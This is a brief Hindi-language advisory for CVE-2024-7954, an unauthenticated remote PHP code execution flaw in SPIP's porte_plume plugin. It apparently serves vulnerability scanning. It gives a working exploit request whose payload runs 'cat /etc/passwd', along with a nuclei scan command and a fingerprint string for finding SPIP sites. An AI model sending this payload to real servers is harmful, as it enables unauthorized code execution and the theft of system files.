
SPIP संस्करण 4.2.12 तक और इसमें शामिल सभी संस्करणों में प्रमाणीकरण रहित दूरस्थ कोड निष्पादन
SPIP द्वारा 4.30-alpha2, 4.2.13, और 4.1.16 से पहले उपयोग किया जाने वाला porte_plume प्लगइन एक मनमाना कोड निष्पादन भेद्यता के लिए संवेदनशील है। एक दूरस्थ और अप्रमाणित हमलावर एक क्राफ्टेड HTTP अनुरोध भेजकर SPIP उपयोगकर्ता के रूप में मनमाना PHP निष्पादित कर सकता है।
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
nuclei --target {host.com} -t CVE-2024-7954.yaml
app="SPIP"